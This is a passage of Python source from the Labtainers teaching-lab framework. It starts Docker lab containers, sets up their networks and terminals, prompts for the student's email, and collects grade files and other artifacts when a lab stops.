elif parts[1] == ('addr:%s' % post_start_if[subnet]):
this_if = current_if
break
count = 1
for ip in post_start_nets[subnet]:
cmd = "docker exec %s bash -c 'ifconfig %s:%d %s'" % (container_name, this_if, count, ip)
logger.debug('next cmd is %s' % cmd)
if not DockerCmd(cmd):
print('error doing %s' % cmd)
exit(1)
count += 1
def MakeNetMap(start_config, mycontainer_name, container_user):
''' filter docker network list to include only tapped lans, and append MAC to each line '''
cmd = "docker network ls"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
nlist = []
for subnet in start_config.subnets:
if start_config.subnets[subnet].tap == 'yes':
nlist.append(subnet)
if len(output[1].strip()) == 0:
with open('/tmp/net_map.txt', 'w') as fh:
''' for each network reported by docker '''
for line in output[0].decode('utf-8').splitlines():
parts = line.split()
net = parts[1]
eth = 'br-%s' % parts[0]
''' find if it matches a tapped subnet in this lab '''
for subnet in nlist:
if subnet == net:
''' NOTE mac is no longer used, include for compatability. Remove later '''
mac = get_hw_address(eth)
new_line = '%s %s\n' % (line, mac)
fh.write(new_line)
break
cmd = 'docker cp /tmp/net_map.txt %s:/var/tmp/' % (mycontainer_name)
DockerCmd(cmd)
def WaitForTap():
tap_dir = GetWaitTapDir()
tap_lock = os.path.join(tap_dir,'lock')
while not os.path.isdir(tap_lock):
logger.debug('tap dir does not yet exist')
time.sleep(1)
def DoStartOne(labname, name, container, start_config, labtainer_config, lab_path,
student_email, quiet_start, results, auto_grade, image_info):
retval = True
mycontainer_name = container.full_name
mycontainer_image_name = container.image_name
container_user = container.user
container_password = container.password
container_hostname = container.hostname
''' mananage interfaces with multiple IP addresses, docker does not support directly '''
post_start_if = {}
post_start_nets = {}
haveContainer = AllContainersCreated(container)
logger.debug("DoStart for %s AllContainersCreated result (%s)" % (container.name, haveContainer))
# Set need_seeds=False first
need_seeds=False
# IsContainerCreated return False if container does not exists
if not haveContainer:
# Container does not exist, create the container
# Use CreateSingleContainer()
containerCreated = False
if len(container.container_nets) == 0 or container.tap == 'yes':
containerCreated = CreateSingleContainer(labtainer_config, start_config, container, quiet=quiet_start)
else:
#mysubnet_name, mysubnet_ip = container.container_nets.popitem()
mysubnet_name = next(iter(container.container_nets))
mysubnet_ip = container.container_nets[mysubnet_name]
container.did_net(mysubnet_name)
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
post_start_if[subnet_name] = mysubnet_ip
containerCreated = CreateSingleContainer(labtainer_config, start_config, container, subnet_name, mysubnet_ip, quiet=quiet_start)
logger.debug("CreateSingleContainer %s result (%s)" % (mycontainer_name, containerCreated))
if not containerCreated:
logger.error("CreateSingleContainer fails to create container %s!\n" % mycontainer_name)
results.append(False)
return
# Give the container some time -- just in case
#time.sleep(3)
# If we just create it, then set need_seeds=True
need_seeds=True
# Check again -
haveContainer = AllContainersCreated(container)
logger.debug("AllContainersCreated second check for %s result (%s)" % (container.name, haveContainer))
# IsContainerCreated returned False if container does not exists
if not haveContainer:
logger.error("Container %s still not created!\n" % mycontainer_name)
results.append(False)
return
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
wait_for_tap = False
for mysubnet_name, mysubnet_ip in container.container_nets.items():
if start_config.subnets[mysubnet_name].tap:
wait_for_tap = True
if mysubnet_name in container.did_nets:
continue
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
if subnet_name not in post_start_nets:
post_start_nets[subnet_name] = []
if subnet_name not in post_start_if:
post_start_if[subnet_name] = mysubnet_ip
logger.debug('container: %s assigned post_start_if[%s] %s, connecting' % (mycontainer_name, subnet_name, mysubnet_ip))
connectNetworkResult = ConnectNetworkToContainer(start_config, mycontainer_name, subnet_name, mysubnet_ip)
else:
post_start_nets[subnet_name].append(mysubnet_ip)
else:
connectNetworkResult = ConnectNetworkToContainer(start_config, mycontainer_name, mysubnet_name, mysubnet_ip)
if wait_for_tap:
WaitForTap()
# Start the container
if not StartMyContainer(mycontainer_name):
logger.error("Container %s failed to start!\n" % mycontainer_name)
results.append(False)
return
defineAdditionalIP(mycontainer_name, post_start_if, post_start_nets)
clone_need_seeds = need_seeds
if not clone_need_seeds:
cmd = "docker exec %s bash -c 'ls -l /var/labtainer/did_param'" % (mycontainer_name)
if not DockerCmd(cmd):
print('One or more containers exists but are not parameterized.')
print('Please restart this lab with the "-r" option.')
DoStop(start_config, labtainer_config, lab_path, False)
logger.error('One or more containers exists but not parameterized.')
sys.exit(1)
# If the container is just created, then use the previous user's e-mail
# then parameterize the container
elif quiet_start and clone_need_seeds:
ParamForStudent(start_config.lab_master_seed, mycontainer_name, mycontainer_image_name, container_user, container_password,
labname, student_email, lab_path, name, image_info)
elif clone_need_seeds:
ParamForStudent(start_config.lab_master_seed, mycontainer_name, mycontainer_image_name, container_user,
container_password, labname, student_email, lab_path, name, image_info)
if container.x11.lower() == 'yes':
''' Avoid problems caused by container wiping out all of /tmp on startup '''
cmd = "docker exec %s bash -c 'if [ -d /tmp/.X11-unix ]; then rm -Rf /tmp/.X11-unix; fi'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = "docker exec %s bash -c 'ln -s /var/tmp/.X11-unix /tmp/.X11-unix'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
if container.no_gw:
cmd = "docker exec %s bash -c 'sudo /bin/ip route del 0/0'" % (mycontainer_name)
DockerCmd(cmd)
cmd = "docker exec %s bash -c 'sudo route del default'" % (mycontainer_name)
DockerCmd(cmd)
if container.tap == 'yes':
MakeNetMap(start_config, mycontainer_name, container_user)
if container.lab_gateway is not None:
cmd = "docker exec %s bash -c 'sudo /usr/bin/set_default_gw.sh %s'" % (mycontainer_name,
container.lab_gateway)
DockerCmd(cmd)
'''
ignore error. TBD filter errors due to my_host not being set
if not DockerCmd(cmd):
logger.error('Fatal error in docker command %s' % cmd)
results.append(False)
return
'''
cmd = "docker exec %s bash -c 'sudo echo \"nameserver %s\" >/etc/resolv.conf'" % (mycontainer_name,
container.lab_gateway)
if not DockerCmd(cmd):
logger.error('Fatal error in docker command %s' % cmd)
results.append(False)
return
cmd = "docker exec %s bash -c 'sudo route del my_host'" % (mycontainer_name)
DockerCmd(cmd)
results.append(retval)
def GetUserEmail(quiet_start):
user_email = None
while user_email is None:
done = True
# Prompt user for e-mail address
eprompt = 'Please enter your e-mail address: '
prev_email = getLastEmail()
if prev_email is not None:
eprompt = eprompt+" [%s]" % prev_email
#checks if quiet_start is true
if quiet_start and prev_email is not None:
user_email = prev_email
else:
if sys.version_info >=(3,0):
user_input = input(eprompt)
else:
user_input = raw_input(eprompt)
if not all(c in string.printable for c in user_input):
print('Bad characters detected. Please re-enter email')
else:
user_email = user_input
if user_email is not None:
#user_email = input(eprompt)
if len(user_email.strip()) == 0:
if prev_email is None:
print('You have provided an empty email address, which may cause your results to not be graded.')
if sys.version_info >=(3,0):
confirm = str(input('Use the empty address? (y/n)')).lower().strip()
else:
confirm = str(raw_input('Use the empty address? (y/n)')).lower().strip()
if confirm != 'y':
user_email = None
else:
user_email = prev_email
else:
putLastEmail(user_email)
return user_email
def CheckLabContainerApps(start_config, lab_path, apps2start):
apps2search = ['firefox', 'wireshark']
has_multi_container = False
num_containers = len(start_config.containers.items())
if num_containers > 1:
has_multi_container = True
apps2startfilepath = os.path.join(lab_path, '*/_bin', 'student_startup.sh')
apps2start_list = glob.glob('%s' % apps2startfilepath)
if apps2start_list != []:
# Parse each student_startup.sh - get a list of apps to start
# Currently only search for firefox or wireshark
for eachfile in apps2start_list:
with open(eachfile) as fh:
for line in fh:
if line.startswith('#') or len(line) == 0:
continue
for apps in apps2search:
if apps in line:
if apps not in apps2start:
apps2start.append(apps)
return has_multi_container
def ReloadStartConfig(lab_path, labtainer_config, start_config, student_email, logger, servers, clone_count):
labname = os.path.basename(lab_path)
my_start_config = os.path.join('./.tmp',labname, 'start.config')
if not os.path.isfile(my_start_config):
config_path = os.path.join(lab_path,"config")
start_config_path = os.path.join(config_path,"start.config")
param_path = os.path.join(config_path,"parameter.config")
try:
os.makedirs(os.path.dirname(my_start_config))
except os.error:
pass
shutil.copyfile(start_config_path, my_start_config)
lab_instance_seed = GetLabSeed(start_config.lab_master_seed, student_email)
logger.debug("lab_instance_seed for <%s> <%s> is %s" % (start_config.lab_master_seed, student_email, lab_instance_seed))
pp = ParameterParser.ParameterParser(None, None, lab_instance_seed, logger, lab=labname)
pp.ParseParameterConfig(param_path)
pp.DoReplace()
start_config = ParseStartConfig.ParseStartConfig(my_start_config, labname, labtainer_config, logger, skip_networks=False,
servers=servers, clone_count=clone_count)
logger.debug('did start.config reload from %s' % my_start_config)
return start_config
def CheckEmailReloadStartConfig(start_config, quiet_start, lab_path, labtainer_config, logger, servers, clone_count):
student_email = None
for name, container in start_config.containers.items():
# Obscure means of making sure we have an email and getting one if
# a container has not yet been created.
if not AllContainersCreated(container) and student_email is None:
if student_email == None:
student_email = GetUserEmail(quiet_start)
else:
student_email = GetUserEmail(True)
if student_email == None:
student_email = GetUserEmail(True)
start_config = ReloadStartConfig(lab_path, labtainer_config, start_config, student_email, logger, servers, clone_count)
return start_config, student_email
def pidExists(pid):
"""Check whether pid exists in the current process table.
UNIX only.
"""
if pid <= 0:
return False
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def ContainerTerminals(lab_path, start_config, container, terminal_count, terminal_groups, container_map):
num_terminal = int(container.terminals)
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
logger.debug("container: %s Number of terminals: %d" % (mycontainer_name, num_terminal))
if mycontainer_name in container_map:
logger.debug('container %s mapped to %s' % (mycontainer_name, container_map[mycontainer_name]))
mycontainer_name = container_map[mycontainer_name]
CopyFilesToHost(lab_path, container.name, mycontainer_name, container.user)
''' HACK remove after a while.... catch case where framework updated to remove XTERM Instructions, but still using image
that includes instructions, which then consumes a window '''
if container.xterm is None:
cmd = "docker exec %s bash -c 'ls -l $HOME/instructions.txt'" % (mycontainer_name)
if DockerCmd(cmd, noloop=True):
logger.debug('Found instructions, force xterm')
container.xterm = 'instructions'
if container.xterm is not None:
logger.debug('container.xterm is <%s>' % container.xterm)
parts = container.xterm.split()
title = parts[0]
command = None
if title.lower() == 'instructions' and len(parts) == 1:
command = 'startup.sh'
elif len(parts) == 2:
command = parts[1]
else:
logger.error("Bad XTERM entryin in start.config: %s" % container.xterm)
exit(1)
if command is not None:
cmd = 'sh -c "cd /home/%s && .local/bin/%s"' % (container.user, command)
terminal_location, columns, lines = terminalCounter(terminal_count)
terminal_count += 1
# note hack to change --geometry to -geometry
spawn_command = "xterm %s -title %s -sb -rightbar -fa 'Monospace' -fs 11 -e docker exec -it %s %s & 2>/tmp/xterm.out" % (terminal_location[1:],
title, mycontainer_name, cmd)
logger.debug("xterm spawn: %s" % spawn_command)
xterm_pid = subprocess.Popen(shlex.split(spawn_command), stdout=subprocess.PIPE,stderr=subprocess.PIPE, close_fds=True).pid
# race condition, gnome may beat xterm to the startup.sh script
if command == 'startup.sh':
done = False
while pidExists(xterm_pid) and not done:
cmd = 'docker exec -it %s ls -l /tmp/.mylockdir' % mycontainer_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if 'No such file or directory' not in output[0].decode('utf-8'):
done = True
else:
time.sleep(0.2)
# If the number of terminals is -1 or zero -- do not spawn
#print('container terms %s is %d' % (mycontainer_name, num_terminal))
if not (num_terminal == 0 or num_terminal == -1):
for x in range(num_terminal):
#sys.stderr.write("%d \n" % terminal_count)
terminal_location, columns, lines = terminalCounter(terminal_count)
#sys.stderr.write("%s \n" % terminal_location)
#sys.stderr.write("%s \n" % mycontainer_name)
cmd = 'bash -l -c bash'
#spawn_command = "gnome-terminal %s -x docker exec -it %s bash -l &" % (terminal_location, mycontainer_name)
if container.terminal_group is not None:
if container.terminal_group not in terminal_groups:
terminal_count += 1
terminal_groups[container.terminal_group] = []
group_command = '"docker exec -it %s %s"' % (mycontainer_name, cmd)
terminal_groups[container.terminal_group].append(group_command)
else:
terminal_count += 1
spawn_command = 'gnome-terminal %s -- docker exec -it --env COLUMNS=%d --env LINES=%d %s %s &' % (terminal_location,
columns, lines, mycontainer_name, cmd)
logger.debug("gnome spawn: %s" % spawn_command)
#print spawn_command
os.system(spawn_command)
return terminal_count
def SkipContainer(run_container, name, start_config, servers):
container = start_config.containers[name]
if run_container is not None and container.full_name != run_container:
return True
if servers is not None:
if servers == 'server':
if container.client == 'yes':
return True
elif servers == 'client':
if container.client != 'yes':
return True
return False
def readFirst(lab_path, labname, fname, quiet_start, bail_option=False):
#
# If a fname exists in the lab's config directory, less it before the student continues.
#
doc_dir = os.path.join(lab_path, 'docs')
read_first = os.path.join(doc_dir, fname)
pdf = '%s.pdf' % labname
manual = os.path.join(doc_dir, pdf)
if os.path.isfile(read_first):
print('\n\n')
command = 'cat %s' % read_first
less = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
sed_cmd = "sed -e s+LAB_MANUAL+%s+ -e s+LAB_DOCS+%s+" % (manual, doc_dir)
sed = subprocess.Popen(sed_cmd.split(), stdin=less.stdout, stdout=subprocess.PIPE)
output = sed.communicate()[0].decode('utf-8')
print(output)
if not quiet_start:
less.wait()
if not bail_option:
if sys.version_info >=(3,0):
dumb = input("Press <enter> to start the lab\n")
else:
dumb = raw_input("Press <enter> to start the lab\n")
else:
if sys.version_info >=(3,0):
dumb = input("Continue? (y/n)")
else:
dumb = raw_input("Continue? (y/n)")
if dumb.lower() != 'y':
cmd = 'rm -fr .tmp/%s' % labname
os.system(cmd)
print('Exiting lab')
exit(0)
def DoTerminals(start_config, lab_path, run_container=None, servers=None, container_map={}):
# spawn terminal for each container based on num_terminal
terminal_count = 0
terminal_groups = {}
for name, container in start_config.containers.items():
# Do not spawn terminal if it is regression testing
if SkipContainer(run_container, name, start_config, servers):
print('herez %s' % name)
continue
terminal_count = ContainerTerminals(lab_path, start_config, container, terminal_count, terminal_groups, container_map)
for tg in terminal_groups:
tab_commands = ''
tab = '--window'
for command in terminal_groups[tg]:
tab_commands = tab_commands+' %s -e %s' % (tab, command)
tab = '--tab'
#tab_commands = tab_commands+' --tab %s --' % command
terminal_location, columns, lines = terminalCounter(terminal_count)
terminal_count += 1
spawn_command = 'gnome-terminal %s %s' % (terminal_location, tab_commands)
FNULL = open(os.devnull, 'w')
result = subprocess.Popen(shlex.split(spawn_command), close_fds=True, stdout=FNULL, stderr=subprocess.STDOUT)
logger.debug("gnome spawn tg: %s" % spawn_command)
#os.system(spawn_command)
def GetWaitTapDir():
user = os.getenv('USER')
wait_tap_dir = os.path.join('/tmp', user, 'wait_tap_dir')
return wait_tap_dir
def DoStart(start_config, labtainer_config, lab_path,
quiet_start, run_container, servers, clone_count, auto_grade=False, debug_grade=False, container_images=None):
labname = os.path.basename(lab_path)
logger.debug("DoStart Multiple Containers and/or multi-home networking")
''' make sure root can access Xserver '''
SetXhost()
apps2start = []
has_multi_container = CheckLabContainerApps(start_config, lab_path, apps2start)
logger.debug("Apps to start is (%s)" % apps2start)
hostSystem_script = os.path.join(lab_path, '*/_bin', 'hostSystemCheck.py')
hostSystemCheckList = glob.glob('%s' % hostSystem_script)
logger.debug("List of hostSystemCheck.py (%s)" % hostSystemCheckList)
# If more than one hostSystemCheck.py - pick first one
if hostSystemCheckList != [] and os.path.isfile(hostSystemCheckList[0]):
# Do Host System Check if necessary (if file exists)
command = "%s" % hostSystemCheckList[0]
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE)
if result == FAILURE:
logger.warning("Host System Check indicates error encountered")
if sys.version_info >=(3,0):
user_input=input("Would you like to quit? (yes/no)\n")
else:
user_input=raw_input("Would you like to quit? (yes/no)\n")
user_input=user_input.strip().lower()
#print "user_input (%s)" % user_input
if user_input == "yes":
sys.exit(1)
# Create SUBNETS
if CreateSubnets(start_config):
''' don't create tapped containers until tap is ready '''
tap_lock_dir = GetWaitTapDir()
lock = os.path.join(tap_lock_dir, 'lock')
try:
os.rmdir(lock)
except:
pass
try:
os.makedirs(tap_lock_dir)
except:
pass
student_email = None
threads = []
results = []
if has_multi_container:
container_warning_printed = False
start_config, student_email = CheckEmailReloadStartConfig(start_config, quiet_start, lab_path,
labtainer_config, logger, servers, clone_count)
for name, container in start_config.containers.items():
if SkipContainer(run_container, name, start_config, servers):
#print('gonna skip %s' % run_container)
continue
if has_multi_container and container_warning_printed == False:
print("Starting the lab, this may take a moment...")
container_warning_printed = True
image_info = None
if container_images is not None:
logger.debug('container images not none,get for %s' % name)
image_info = container_images[name]
logger.debug('container images got image_info %s' % image_info)
if image_info is None:
print('is none, map is %s' % str(container_images))
t = threading.Thread(target=DoStartOne, args=(labname, name, container, start_config, labtainer_config, lab_path,
student_email, quiet_start, results, auto_grade, image_info))
threads.append(t)
t.setName(name)
t.start()
logger.debug('started all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
if False in results:
DoStop(start_config, labtainer_config, lab_path, False, run_container, servers)
logger.error('DoStartOne has at least one failure!')
sys.exit(1)
readFirst(lab_path, labname, 'read_first.txt', quiet_start)
DoTerminals(start_config, lab_path, run_container=run_container, servers=servers)
if apps2start != [] and not auto_grade:
print("Please wait for the apps (%s) to launch" % apps2start)
syncdir = os.path.join(os.getenv('LABTAINER_DIR'), 'scripts','labtainer-student', '.tmp', labname, 'sync')
logger.debug('syncdir %s' % syncdir)
try:
os.mkdir(syncdir)
except:
pass
logger.debug('Labtainer lab %s started and ready' % labname)
return 0
def terminalCounter(terminal_count):
columns = 100
lines = 25
x_coordinate = columns + ( 50 * terminal_count )
y_coordinate = 75 + ( 50 * terminal_count)
terminal_location = "--geometry %dx%d+%d+%d" % (columns, lines, x_coordinate, y_coordinate)
return terminal_location, columns, lines
def terminalWideCounter(terminal_count):
x_coordinate = 100 + ( 50 * terminal_count )
y_coordinate = 75 + ( 50 * terminal_count)
terminal_location = "--geometry 160x35+%d+%d" % (x_coordinate, y_coordinate)
return terminal_location
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
def CreateHostHomeXfer(host_xfer_dir):
# remove trailing '/'
host_xfer_dir = host_xfer_dir.rstrip('/')
logger.debug("host_home_xfer directory (%s)" % host_xfer_dir)
if os.path.exists(host_xfer_dir):
# exists but is not a directory
if not os.path.isdir(host_xfer_dir):
# remove file then create directory
os.remove(host_xfer_dir)
os.makedirs(host_xfer_dir)
#else:
# logger.debug("host_home_xfer directory (%s) exists" % host_xfer_dir)
else:
# does not exists, create directory
os.makedirs(host_xfer_dir)
# CopyChownGradesFile
def CopyChownGradesFile(start_config, labtainer_config, name, container_name, container_user, ignore_stop_error):
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, start_config.labname)
labname = start_config.labname
username = getpass.getuser()
# Copy <labname>.grades.txt file
grade_filename = '/home/%s/%s.grades.txt' % (container_user, labname)
command = "docker cp %s:%s /home/%s/%s" % (container_name, grade_filename, username, host_home_xfer)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp %s.grades.txt file is %s" % (labname, result))
if result == FAILURE:
# try grabbing instructor.log
command = "docker cp %s:/tmp/instructor.log /tmp/instructor.log" % (container_name)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp instructor.log file is %s" % (result))
clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
if ignore_stop_error:
logger.debug("Container %s fail on executing cp %s.grades.txt file!\n" % (container_name, labname))
else:
logger.warning("Container %s fail on executing cp %s.grades.txt file!\n" % (container_name, labname))
return
# Copy <labname>.grades.json file
gradejson_filename = '/home/%s/%s.grades.json' % (container_user, labname)
command = "docker cp %s:%s /home/%s/%s" % (container_name, gradejson_filename, username, host_home_xfer)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp %s.grades.json file is %s" % (labname, result))
if result == FAILURE:
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
if ignore_stop_error:
logger.debug("Container %s fail on executing cp %s.grades.json file!\n" % (container_name, labname))
else:
logger.warning("Container %s fail on executing cp %s.grades.json file!\n" % (container_name, labname))
return
def StartLab(lab_path, force_build=False, is_redo=False, quiet_start=False,
run_container=None, servers=None, clone_count=None, auto_grade=False, debug_grade=False):
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
logger.debug("current working directory for %s" % mycwd)
logger.debug("current user's home directory for %s" % myhomedir)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
lab_count = LabCount.addCount('./', labname, is_redo, logger)
if lab_count == 1:
readFirst(lab_path, labname, 'read_pre.txt', quiet_start, bail_option=True)
labtainer_config, start_config = GetBothConfigs(lab_path, logger, servers, clone_count)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
LABS_DIR = os.path.abspath('../../labs')
didfix = False
''' hackey assumption about running from labtainers-student or labtainers-instructor '''
container_bin = './bin'
if is_redo or force_build:
my_start_config = os.path.join('./.tmp',labname, 'start.config')
if os.path.isfile(my_start_config):
logger.debug('Cached start.config removed %s' % my_start_config)
os.remove(my_start_config)
x11 = False
container_images = {}
for name, container in start_config.containers.items():
if SkipContainer(run_container, name, start_config, servers):
#print('skipping name %s %s' % (name, start_config.containers[name]))
continue
mycontainer_name = container.full_name
mycontainer_image_name = container.image_name
if container.x11.lower() == 'yes':
x11 = True
if is_redo:
# If it is a redo then always remove any previous container
# If it is not a redo, i.e., start.py then DO NOT remove existing container
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
cmd = 'docker rm %s' % clone_full
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug("Command was (%s)" % cmd)
if len(output[1]) > 0:
logger.debug("Error from command = '%s'" % str(output[1].decode('utf-8')))
#image_exists, result, dumb = ImageExists(mycontainer_image_name, container.registry)
if container.registry == labtainer_config.test_registry:
branch, container_registry = registry.getBranchRegistry()
base_registry = container_registry
else:
container_registry = container.registry
base_registry = container.base_registry
image_info = imageInfo(mycontainer_image_name, container_registry, base_registry, labtainer_config, quiet=quiet_start)
container_images[name] = image_info
if image_info is not None:
logger.debug('Image version %s framework_version %s' % (image_info.version, framework_version))
if image_info.version is not None and int(image_info.version) > framework_version:
print('**** Labtainer update required *****')
print('This lab requires that you update your labtainers installation.')
print('Please type: update-labtainer.sh')
print('and then try starting the lab again.')
exit(0)
if not image_info.local:
dockerPull(container_registry, mycontainer_image_name)
else:
logger.error('Could not find image info for %s' % name)
exit(1)
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
CreateHostHomeXfer(host_xfer_dir)
if x11:
sockets = os.listdir('/tmp/.X11-unix')
if len(sockets) == 0:
print('Cannot create X11 windows, the socket is missing. Try rebooting your VM')
logger.debug('Cannot create X11 windows, the socket is missing. Try rebooting your VM')
exit(1)
DoStart(start_config, labtainer_config, lab_path, quiet_start,
run_container, servers=servers, clone_count=clone_count, auto_grade=auto_grade,
debug_grade=debug_grade, container_images=container_images)
def dumb():
pass
'''
'''
def RedoLab(lab_path, force_build=False, is_redo=False, quiet_start=False,
run_container=None, servers=None, clone_count=None, auto_grade=False, debug_grade=False):
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
# Pass 'True' to ignore_stop_error (i.e., ignore certain error encountered during StopLab
# since it might not even be an error)
lab_list, dumb = GetListRunningLabType()
if len(lab_list) > 0:
StopLab(lab_path, True)
is_redo = True
StartLab(lab_path, force_build, is_redo=is_redo, quiet_start=quiet_start,
run_container=run_container, servers=servers, clone_count=clone_count, auto_grade=auto_grade, debug_grade=debug_grade)
def CheckShutdown(lab_path, name, container_name, container_user, ignore_stop_error):
''' NOT USED at the moment '''
done = False
count = 0
while not done:
command='docker cp %s:/tmp/.shutdown_done /tmp/' % (container_name)
logger.debug(command)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
logger.debug("response from docker cp %s" % error)
time.sleep(1)
else:
logger.debug("must have found the shutdown_done file")
done = True
count += 1
if count > 5:
done = True
def PreStop(container_name, ts):
logger.debug("About to call prestop")
cmd_path = '$HOME/.local/bin/prestop'
cmd = "docker exec %s bash -c 'ls -l %s'" % (container_name, cmd_path)
if DockerCmd(cmd, noloop=True):
cmd = "docker exec %s bash -c 'timeout -s SIGTERM 20s %s >$HOME/.local/result/prestop.stdout.%s 2>&1'" % (container_name, cmd_path, ts)
DockerCmd(cmd, noloop=True)
def GatherOtherArtifacts(lab_path, name, container_name, container_user, container_password, ignore_stop_error):
'''
Parse the results.config file looking for files named by absolute paths,
and copy those into the .local/result directory, maintaining the original
directory structure, e.g., .local/result/var/log/foo.log
'''
config_path = os.path.join(lab_path,"instr_config")
results_config_path = os.path.join(config_path,"results.config")
did_file = []
CopyAbsToResult(container_name, '/root/.bash_history', container_user, ignore_stop_error)
did_file.append('/root/.bash_history')
with open (results_config_path) as fh:
for line in fh:
''' container:filename is between "=" and first " : " '''
line = line.strip()
if line.startswith('#') or len(line) == 0:
continue
if '=' not in line:
logger.warning('no = in line %s' % line)
continue
after_equals = line.split('=', 1)[1].strip()
# note assumes field delimeters are space-:-space, vice container:file
fname = after_equals.split(' : ')[0].strip()
is_mine = False
if ':' in fname:
'''
[container_name:]<prog>.[stdin | stdout] | [container_name:]file_path[:time_program]
'''
f_container = None
parts = fname.split(':')
if len(parts) == 2:
if parts[0].startswith('/'):
filename = parts[0]
else:
f_container = parts[0]
filename = parts[1]
elif len(parts) == 3:
f_container = parts[0]
filename = parts[1]
if f_container is not None and f_container.strip() == name:
is_mine = True
filename = filename.strip()
else:
is_mine = True
filename = fname
if is_mine:
if filename.startswith('/') and filename not in did_file:
''' copy from abs path to ~/.local/result '''
logger.debug('file on this container to copy <%s>' % filename )
CopyAbsToResult(container_name, filename, container_user, ignore_stop_error)
did_file.append(filename)
def CopyAbsToResult(container_name, fname, container_user, ignore_stop_error):
''' copy from abs path to ~/.local/result '''
command='docker exec %s mkdir -p /home/%s/.local/result' % (container_name, container_user)
command='docker exec %s sudo cp --parents %s /home/%s/.local/result' % (container_name, fname, container_user)
logger.debug(command)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
if ignore_stop_error:
logger.debug('error from docker: %s' % error)
logger.debug('command was %s' % command)
else:
logger.debug('error from docker: %s' % error)
logger.debug('command was %s' % command)
#command='docker exec %s echo "%s\n" | sudo -S chmod a+r -R /home/%s/.local/result' % (container_name, container_password, container_user)
command='docker exec %s sudo chmod a+r -R /home/%s/.local/result' % (container_name, container_user)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
if ignore_stop_error:
logger.debug('chmod ERROR: %s' % error)
logger.debug('command was %s' % command)
else:
logger.error('chmod ERROR: %s' % error)
logger.error('command was %s' % command)
def CreateCopyChownZip(start_config, labtainer_config, name, container_name, container_image, container_user,
container_password, ignore_stop_error, keep_running, running_container=None):
'''
Zip up the student home directory and copy it to the Linux host home directory
'''
logger.debug('in CreateCopyChownZip')
if running_container is None:
running_container = container_name
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, start_config.labname)
# Run 'Student.py' - This will create zip file of the result
logger.debug("About to call Student.py")
''' Copy the Student.py on each stop to handle cases where the parameter list changes.'''
cmd = 'docker cp lab_bin/Student.py %s:/home/%s/.local/bin/' % (running_container, container_user)
if not DockerCmd(cmd):
logger.error('failed to copy Student.py')
cmd_path = '/home/%s/.local/bin/Student.py' % (container_user)
#command=['docker', 'exec', '-i', container_name, 'echo "%s\n" |' % container_password, '/usr/bin/sudo', cmd_path, container_user, container_image]
command=['docker', 'exec', '-i', running_container, '/usr/bin/sudo', cmd_path, container_user, container_image, str(keep_running)]
logger.debug('cmd: %s' % str(command))
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = child.communicate()
''' TBD remaining problems with flushing stdout? '''
#if keep_running and len(output[0].strip()) > 0:
# print('\n<<<<< You may need to stop: %s in order to obtain a complete assessment. >>>>>\n' % output[0].decode('utf-8').strip())
if len(output[1].strip()) > 0:
if ignore_stop_error:
logger.debug("Container %s fail on executing Student.py %s \n" % (running_container, output[1].decode('utf-8')))
else:
logger.error("Container %s fail on executing Student.py %s \n" % (running_container, output[1].decode('utf-8')))
return None, None
logger.debug("results from Student.py: %s" % output[0].decode('utf-8'))
#out_string = output[0].strip()
#if len(out_string) > 0:
# logger.debug('output of Student.py is %s' % out_string)
username = getpass.getuser()
tmp_dir=os.path.join('/tmp/labtainers', container_name)
shutil.rmtree(tmp_dir, ignore_errors=True)
try:
os.makedirs(tmp_dir)
except os.error:
logger.error("did not expect to find dir %s" % tmp_dir)
source_dir = os.path.join('/home', container_user, '.local', 'zip')
cont_source = '%s:%s' % (container_name, source_dir)
logger.debug('will copy from %s ' % source_dir)
